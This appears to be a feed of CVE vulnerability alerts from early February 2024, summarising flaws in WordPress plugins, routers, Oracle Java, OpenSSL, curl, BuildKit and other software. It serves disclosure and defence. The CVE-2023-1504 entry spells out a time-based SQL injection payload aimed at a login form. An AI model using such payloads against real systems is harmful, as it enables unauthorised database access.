🚨 CVE-2024-1167When SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information unrestricted file access can occur.🎖@cveNotify |
|
| 2024-02-01 18:37:26 |
🚨 CVE-2023-51446GLPI is a Free Asset and IT Management Software package. When authentication is made against a LDAP, the authentication form can be used to perform LDAP injection. Upgrade to 10.0.12.🎖@cveNotify |
|
| 2024-02-01 18:37:25 |
🚨 CVE-2022-3703All versions of ETIC Telecom Remote Access Server (RAS) 4.5.0 and prior’s web portal is vulnerable to accepting malicious firmware packages that could provide a backdoor to an attacker and provide privilege escalation to the device.🎖@cveNotify |
|
| 2024-02-01 18:07:32 |
🚨 CVE-2023-4781Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1873.🎖@cveNotify |
|
| 2024-02-01 18:07:25 |
🚨 CVE-2022-38143A heap out-of-bounds write vulnerability exists in the way OpenImageIO v2.3.19.0 processes RLE encoded BMP images. A specially-crafted bmp file can write to arbitrary out of bounds memory, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-01 18:07:24 |
🚨 CVE-2022-2808Authorization Bypass Through User-Controlled Key vulnerability in Algan Software Prens Student Information System allows Object Relational Mapping Injection.This issue affects Prens Student Information System: before 2.1.11.🎖@cveNotify |
|
| 2024-02-01 17:37:44 |
🚨 CVE-2024-20961Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-02-01 17:37:37 |
🚨 CVE-2024-20926Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-02-01 17:37:36 |
🚨 CVE-2024-20918Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2024-02-01 17:37:33 |
🚨 CVE-2023-5363Issue summary: A bug has been identified in the processing of key andinitialisation vector (IV) lengths. This can lead to potential truncationor overruns during the initialisation of some symmetric ciphers.Impact summary: A truncation in the IV can result in non-uniqueness,which could result in loss of confidentiality for some cipher modes.When calling EVP_EncryptInit_ex2(), EVP_DecryptInit_ex2() orEVP_CipherInit_ex2() the provided OSSL_PARAM array is processed afterthe key and IV have been established. Any alterations to the key length,via the "keylen" parameter or the IV length, via the "ivlen" parameter,within the OSSL_PARAM array will not take effect as intended, potentiallycausing truncation or overreading of these values. The following ciphersand cipher modes are impacted: RC2, RC4, RC5, CCM, GCM and OCB.For the CCM, GCM and OCB cipher modes, truncation of the IV can result inloss of confidentiality. For example, when following NIST's SP 800-38Dsection 8.2.1 guidance for constructing a deterministic IV for AES inGCM mode, truncation of the counter portion could lead to IV reuse.Both truncations and overruns of the key and overruns of the IV willproduce incorrect results and could, in some cases, trigger a memoryexception. However, these issues are not currently assessed as securitycritical.Changing the key and/or IV lengths is not considered to be a common operationand the vulnerable API was recently introduced. Furthermore it is likely thatapplication developers will have spotted this problem during testing sincedecryption would fail unless both peers in the communication were similarlyvulnerable. For these reasons we expect the probability of an application beingvulnerable to this to be quite low. However if an application is vulnerable thenthis issue is considered very serious. For these reasons we have assessed thisissue as Moderate severity overall.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this becausethe issue lies outside of the FIPS provider boundary.OpenSSL 3.1 and 3.0 are vulnerable to this issue.🎖@cveNotify |
|
| 2024-02-01 17:37:32 |
🚨 CVE-2023-38545This flaw makes curl overflow a heap based buffer in the SOCKS5 proxyhandshake.When curl is asked to pass along the host name to the SOCKS5 proxy to allowthat to resolve the address instead of it getting done by curl itself, themaximum length that host name can be is 255 bytes.If the host name is detected to be longer, curl switches to local nameresolving and instead passes on the resolved address only. Due to this bug,the local variable that means "let the host resolve the name" could get thewrong value during a slow SOCKS5 handshake, and contrary to the intention,copy the too long host name to the target buffer instead of copying just theresolved address there.The target buffer being a heap based buffer, and the host name coming from theURL that curl has been told to operate with.🎖@cveNotify |
|
| 2024-02-01 17:37:31 |
🚨 CVE-2023-2283A vulnerability was found in libssh, where the authentication check of the connecting client can be bypassed in the`pki_verify_data_signature` function in memory allocation problems. This issue may happen if there is insufficient memory or the memory usage is limited. The problem is caused by the return value `rc,` which is initialized to SSH_ERROR and later rewritten to save the return value of the function call `pki_key_check_hash_compatible.` The value of the variable is not changed between this point and the cryptographic verification. Therefore any error between them calls `goto error` returning SSH_OK.🎖@cveNotify |
|
| 2024-02-01 17:37:26 |
🚨 CVE-2023-22462Grafana is an open-source platform for monitoring and observability. On 2023-01-01 during an internal audit of Grafana, a member of the security team found a stored XSS vulnerability affecting the core plugin "Text". The stored XSS vulnerability requires several user interactions in order to be fully exploited. The vulnerability was possible due to React's render cycle that will pass though the unsanitized HTML code, but in the next cycle the HTML is cleaned up and saved in Grafana's database. An attacker needs to have the Editor role in order to change a Text panel to include JavaScript. Another user needs to edit the same Text panel, and click on "Markdown" or "HTML" for the code to be executed. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. This issue has been patched in versions 9.2.10 and 9.3.4.🎖@cveNotify |
|
| 2024-02-01 17:37:25 |
🚨 CVE-2023-24523An attacker authenticated as a non-admin user with local access to a server port assigned to the SAP Host Agent (Start Service) - versions 7.21, 7.22, can submit a crafted ConfigureOutsideDiscovery request with an operating system command which will be executed with administrator privileges. The OS command can read or modify any user or system data and can make the system unavailable.🎖@cveNotify |
|
| 2024-02-01 17:07:25 |
🚨 CVE-2022-43594Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerability applies to writing .bmp files.🎖@cveNotify |
|
| 2024-02-01 17:07:24 |
🚨 CVE-2022-23520rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Prior to version 1.4.4, there is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer due to an incomplete fix of CVE-2022-32209. Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags to allow both "select" and "style" elements. Code is only impacted if allowed tags are being overridden. This issue is patched in version 1.4.4. All users overriding the allowed tags to include both "select" and "style" should either upgrade or use this workaround: Remove either "select" or "style" from the overridden allowed tags. NOTE: Code is _not_ impacted if allowed tags are overridden using either the :tags option to the Action View helper method sanitize or the :tags option to the instance method SafeListSanitizer#sanitize.🎖@cveNotify |
|
| 2024-02-01 15:07:26 |
🚨 CVE-2023-25832There is a cross-site-request forgery vulnerability in Esri Portal for ArcGIS Versions 11.0 and below that may allow an attacker to trick an authorized user into executing unwanted actions.🎖@cveNotify |
|
| 2024-02-01 15:07:25 |
🚨 CVE-2023-0979Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MedData MedDataPACS allows SQL Injection.This issue affects MedDataPACS : before 2023-03-03.🎖@cveNotify |
|
| 2024-02-01 15:07:24 |
🚨 CVE-2023-0839Improper Protection for Outbound Error Messages and Alert Signals vulnerability in ProMIS Process Co. InSCADA allows Account Footprinting.This issue affects inSCADA: before 20230115-1.🎖@cveNotify |
|
| 2024-02-01 14:37:37 |
🚨 CVE-2024-24061springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sysContent/add.🎖@cveNotify |
|
| 2024-02-01 14:37:36 |
🚨 CVE-2024-24059springboot-manager v1.6 is vulnerable to Arbitrary File Upload. The system does not filter the suffixes of uploaded files.🎖@cveNotify |
|
| 2024-02-01 14:37:35 |
🚨 CVE-2024-0935An insertion of Sensitive Information into Log File vulnerability is affecting DELMIA Apriso Release 2019 through Release 2024🎖@cveNotify |
|
| 2024-02-01 14:37:32 |
🚨 CVE-2023-6078An OS Command Injection vulnerability exists in BIOVIA Materials Studio products from Release BIOVIA 2021 through Release BIOVIA 2023. Upload of a specially crafted perl script can lead to arbitrary command execution.🎖@cveNotify |
|
| 2024-02-01 14:37:31 |
🚨 CVE-2024-0931A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-01 14:37:30 |
🚨 CVE-2024-0930A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-01 14:37:26 |
🚨 CVE-2024-0928A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-01 14:37:25 |
🚨 CVE-2023-34455snappy-java is a fast compressor/decompressor for Java. Due to use of an unchecked chunk length, an unrecoverable fatal error can occur in versions prior to 1.1.10.1.The code in the function hasNextChunk in the fileSnappyInputStream.java checks if a given stream has more chunks to read. It does that by attempting to read 4 bytes. If it wasn’t possible to read the 4 bytes, the function returns false. Otherwise, if 4 bytes were available, the code treats them as the length of the next chunk.In the case that the `compressed` variable is null, a byte array is allocated with the size given by the input data. Since the code doesn’t test the legality of the `chunkSize` variable, it is possible to pass a negative number (such as 0xFFFFFFFF which is -1), which will cause the code to raise a `java.lang.NegativeArraySizeException` exception. A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), which would raise the fatal `java.lang.OutOfMemoryError` error.Version 1.1.10.1 contains a patch for this issue.🎖@cveNotify |
|
| 2024-02-01 14:37:24 |
🚨 CVE-2023-27559IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash when using a specially crafted subquery. IBM X-Force ID: 249196.🎖@cveNotify |
|
| 2024-02-01 14:07:45 |
🚨 CVE-2023-52195Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Posts to Page Kerry James allows Stored XSS.This issue affects Kerry James: from n/a through 1.7.🎖@cveNotify |
|
| 2024-02-01 14:07:44 |
🚨 CVE-2023-52194Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Takayuki Miyauchi oEmbed Gist allows Stored XSS.This issue affects oEmbed Gist: from n/a through 4.9.1.🎖@cveNotify |
|
| 2024-02-01 14:07:43 |
🚨 CVE-2023-52192Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Keap Keap Official Opt-in Forms allows Stored XSS.This issue affects Keap Official Opt-in Forms: from n/a through 1.0.11.🎖@cveNotify |
|
| 2024-02-01 14:07:39 |
🚨 CVE-2023-52189Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jhayghost Ideal Interactive Map allows Stored XSS.This issue affects Ideal Interactive Map: from n/a through 1.2.4.🎖@cveNotify |
|
| 2024-02-01 14:07:38 |
🚨 CVE-2023-37621An issue in Fronius Datalogger Web v.2.0.5-4, allows remote attackers to obtain sensitive information via a crafted request.🎖@cveNotify |
|
| 2024-02-01 14:07:34 |
🚨 CVE-2024-22859Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function.🎖@cveNotify |
|
| 2024-02-01 14:07:33 |
🚨 CVE-2024-23941Cross-site scripting vulnerability exists in Group Office prior to v6.6.182, prior to v6.7.64 and prior to v6.8.31, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.🎖@cveNotify |
|
| 2024-02-01 14:07:32 |
🚨 CVE-2023-7069The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2023.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-01 14:07:29 |
🚨 CVE-2023-39219PingFederate Administrative Console dependency contains a weakness where console becomes unresponsive with crafted Java class loading enumeration requests🎖@cveNotify |
|
| 2024-02-01 14:07:28 |
🚨 CVE-2023-37283Under a very specific and highly unrecommended configuration, authentication bypass is possible in the PingFederate Identifier First Adapter🎖@cveNotify |
|
| 2024-02-01 14:07:27 |
🚨 CVE-2023-37466vm2 is an advanced vm/sandbox for Node.js. The library contains critical security issues and should not be used for production. The maintenance of the project has been discontinued. In vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed with the `@@species` accessor property allowing attackers to escape the sandbox and run arbitrary code, potentially allowing remote code execution inside the context of vm2 sandbox.🎖@cveNotify |
|
| 2024-02-01 14:07:26 |
🚨 CVE-2023-32305aiven-extras is a PostgreSQL extension. Versions prior to 1.1.9 contain a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages missing schema qualifiers on privileged functions called by the aiven-extras extension. A low privileged user can create objects that collide with existing function names, which will then be executed instead. Exploiting this vulnerability could allow a low privileged user to acquire `superuser` privileges, which would allow full, unrestricted access to all data and database functions. And could lead to arbitrary code execution or data access on the underlying host as the `postgres` user. The issue has been patched as of version 1.1.9.🎖@cveNotify |
|
| 2024-02-01 12:37:25 |
🚨 CVE-2023-51509Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login allows Reflected XSS.This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.1.🎖@cveNotify |
|
| 2024-02-01 12:37:24 |
🚨 CVE-2023-51506Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WPCS – WordPress Currency Switcher Professional allows Stored XSS.This issue affects WPCS – WordPress Currency Switcher Professional: from n/a through 1.2.0.🎖@cveNotify |
|
| 2024-02-01 11:37:41 |
🚨 CVE-2023-51694Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Epiphyt Embed Privacy allows Stored XSS.This issue affects Embed Privacy: from n/a through 1.8.0.🎖@cveNotify |
|
| 2024-02-01 11:37:36 |
🚨 CVE-2023-51691Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gVectors Team Comments – wpDiscuz allows Stored XSS.This issue affects Comments – wpDiscuz: from n/a through 7.6.12.🎖@cveNotify |
|
| 2024-02-01 11:37:35 |
🚨 CVE-2023-51685Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LJ Apps WP Review Slider allows Stored XSS.This issue affects WP Review Slider: from n/a through 12.7.🎖@cveNotify |
|
| 2024-02-01 11:37:31 |
🚨 CVE-2023-51677Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS.This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.23.🎖@cveNotify |
|
| 2024-02-01 11:37:30 |
🚨 CVE-2023-51669Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artios Media Product Code for WooCommerce allows Stored XSS.This issue affects Product Code for WooCommerce: from n/a through 1.4.4.🎖@cveNotify |
|
| 2024-02-01 11:37:29 |
🚨 CVE-2023-51666Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Related Post allows Stored XSS.This issue affects Related Post: from n/a through 2.0.53.🎖@cveNotify |
|
| 2024-02-01 11:37:26 |
🚨 CVE-2023-51548Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Neil Gee SlickNav Mobile Menu allows Stored XSS.This issue affects SlickNav Mobile Menu: from n/a through 1.9.2.🎖@cveNotify |
|
| 2024-02-01 11:37:25 |
🚨 CVE-2023-51534Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brave Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content allows Stored XSS.This issue affects Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content: from n/a through 0.6.2.🎖@cveNotify |
|
| 2024-02-01 11:37:24 |
🚨 CVE-2023-51532Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Icegram Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building allows Stored XSS.This issue affects Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building: from n/a through 3.1.19.🎖@cveNotify |
|
| 2024-02-01 10:37:36 |
🚨 CVE-2024-22449Dell PowerScale OneFS versions 9.0.0.x through 9.6.0.x contains a missing authentication for critical function vulnerability. A low privileged local malicious user could potentially exploit this vulnerability to gain elevated access.🎖@cveNotify |
|
| 2024-02-01 10:37:35 |
🚨 CVE-2024-22148Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Smart Editor JoomUnited allows Reflected XSS.This issue affects JoomUnited: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-02-01 10:37:31 |
🚨 CVE-2023-52195Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Posts to Page Kerry James allows Stored XSS.This issue affects Kerry James: from n/a through 1.7.🎖@cveNotify |
|
| 2024-02-01 10:37:30 |
🚨 CVE-2023-52192Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Keap Keap Official Opt-in Forms allows Stored XSS.This issue affects Keap Official Opt-in Forms: from n/a through 1.0.11.🎖@cveNotify |
|
| 2024-02-01 10:37:26 |
🚨 CVE-2023-52191Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-02-01 10:37:25 |
🚨 CVE-2023-52175Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Uno (miunosoft) Auto Amazon Links – Amazon Associates Affiliate Plugin allows Stored XSS.This issue affects Auto Amazon Links – Amazon Associates Affiliate Plugin: from n/a through 5.1.1.🎖@cveNotify |
|
| 2024-02-01 10:37:24 |
🚨 CVE-2024-0564A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is "max page sharing=256", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's "max page share". Through these operations, the attacker can leak the victim's page.🎖@cveNotify |
|
| 2024-02-01 09:37:24 |
🚨 CVE-2023-37621An issue in Fronius Datalogger Web v.2.0.5-4, allows remote attackers to obtain sensitive information via a crafted request.🎖@cveNotify |
|
| 2024-02-01 07:37:25 |
🚨 CVE-2024-22859Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function.🎖@cveNotify |
|
| 2024-02-01 07:37:24 |
🚨 CVE-2023-47024Cross-Site Request Forgery (CSRF) in NCR Terminal Handler v.1.5.1 leads to a one-click account takeover. This is achieved by exploiting multiple vulnerabilities, including an undisclosed function in the WSDL that has weak security controls and can accept custom content types.🎖@cveNotify |
|
| 2024-02-01 05:07:32 |
🚨 CVE-2024-24327TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pppoePass parameter in the setIpv6Cfg function.🎖@cveNotify |
|
| 2024-02-01 05:07:26 |
🚨 CVE-2024-24326TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the arpEnable parameter in the setStaticDhcpRules function.🎖@cveNotify |
|
| 2024-02-01 05:07:25 |
🚨 CVE-2023-48202Cross-Site Scripting (XSS) vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate privileges via a crafted SVG file in the File Manager component.🎖@cveNotify |
|
| 2024-02-01 05:07:24 |
🚨 CVE-2023-48201Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component.🎖@cveNotify |
|
| 2024-02-01 04:37:33 |
🚨 CVE-2023-6482Use of encryption key derived from static information in Synaptics Fingerprint Driver allows an attacker to set up a TLS session with the fingerprint sensor and send restricted commands to the fingerprint sensor. This may allow an attacker, who has physical access to the sensor, to enroll a fingerprint into the template database.🎖@cveNotify |
|
| 2024-02-01 04:37:26 |
🚨 CVE-2024-22283Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Delhivery Delhivery Logistics Courier.This issue affects Delhivery Logistics Courier: from n/a through 1.0.107.🎖@cveNotify |
|
| 2024-02-01 04:37:25 |
🚨 CVE-2024-0939A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-01 03:37:41 |
🚨 CVE-2024-24573facileManager is a modular suite of web apps built with the sysadmin in mind. In versions 4.5.0 and earlier, when a user updates their profile, a POST request containing user information is sent to the endpoint server/fm-modules/facileManager/ajax/processPost.php. It was found that non-admins can arbitrarily set their permissions and grant their non-admin accounts with super user privileges.🎖@cveNotify |
|
| 2024-02-01 03:37:36 |
🚨 CVE-2024-24747MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.🎖@cveNotify |
|
| 2024-02-01 03:37:35 |
🚨 CVE-2024-23652BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.🎖@cveNotify |
|
| 2024-02-01 03:37:31 |
🚨 CVE-2024-23651BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Two malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container. The issue has been fixed in v0.12.5. Workarounds include, avoiding using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with --mount=type=cache,source=... options.🎖@cveNotify |
|
| 2024-02-01 03:37:30 |
🚨 CVE-2022-47072SQL injection vulnerability in Enterprise Architect 16.0.1605 32-bit allows attackers to run arbitrary SQL commands via the Find parameter in the Select Classifier dialog box..🎖@cveNotify |
|
| 2024-02-01 03:37:26 |
🚨 CVE-2024-1115A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function dlfile of the file /application/websocket/controller/Setting.php. The manipulation of the argument phpPath leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252473 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-01 03:37:25 |
🚨 CVE-2024-1113A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471.🎖@cveNotify |
|
| 2024-02-01 03:37:24 |
🚨 CVE-2023-28807In Zscaler Internet Access (ZIA) a mismatch between Connect Host and Client Hello's Server Name Indication (SNI) enables attackers to evade network security controls by hiding their communications within legitimate traffic.🎖@cveNotify |
|
| 2024-02-01 02:37:26 |
🚨 CVE-2023-27500An attacker with non-administrative authorizations can exploit a directory traversal flaw in program SAPRSBRO to over-write system files. In this attack, no data can be read but potentially critical OS files can be over-written making the system unavailable.🎖@cveNotify |
|
| 2024-02-01 02:37:25 |
🚨 CVE-2020-5330Dell EMC Networking X-Series firmware versions 3.0.1.2 and older, Dell EMC Networking PC5500 firmware versions 4.1.0.22 and older and Dell EMC PowerEdge VRTX Switch Modules firmware versions 2.0.0.77 and older contain an information disclosure vulnerability. A remote unauthenticated attacker could exploit this vulnerability to retrieve sensitive data by sending a specially crafted request to the affected endpoints.🎖@cveNotify |
|
| 2024-02-01 02:37:24 |
🚨 CVE-2008-0595dbus-daemon in D-Bus before 1.0.3, and 1.1.x before 1.1.20, recognizes send_interface attributes in allow directives in the security policy only for fully qualified method calls, which allows local users to bypass intended access restrictions via a method call with a NULL interface.🎖@cveNotify |
|
| 2024-02-01 02:07:33 |
🚨 CVE-2024-21893A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.🎖@cveNotify |
|
| 2024-02-01 02:07:28 |
🚨 CVE-2023-1504A vulnerability classified as critical was found in SourceCodester Alphaware Simple E-Commerce System 1.0. This vulnerability affects unknown code. The manipulation of the argument email/password with the input test1%40test.com ' AND (SELECT 6077 FROM (SELECT(SLEEP(5)))dltn) AND 'PhRa'='PhRa leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223408.🎖@cveNotify |
|
| 2024-02-01 02:07:27 |
🚨 CVE-2013-4587Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value.🎖@cveNotify |
|
| 2024-02-01 01:37:32 |
🚨 CVE-2022-40302An issue was discovered in bgpd in FRRouting (FRR) through 8.4. By crafting a BGP OPEN message with an option of type 0xff (Extended Length from RFC 9072), attackers may cause a denial of service (assertion failure and daemon restart, or out-of-bounds read). This is possible because of inconsistent boundary checks that do not account for reading 3 bytes (instead of 2) in this 0xff case.🎖@cveNotify |
|
| 2024-02-01 01:37:25 |
🚨 CVE-2022-29532An issue was discovered in MISP before 2.4.158. There is XSS in the cerebrate view if one administrator puts a javascript: URL in the URL field, and another administrator clicks on it.🎖@cveNotify |
|
| 2024-02-01 01:37:24 |
🚨 CVE-2020-11987Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.🎖@cveNotify |
|
| 2024-02-01 01:07:32 |
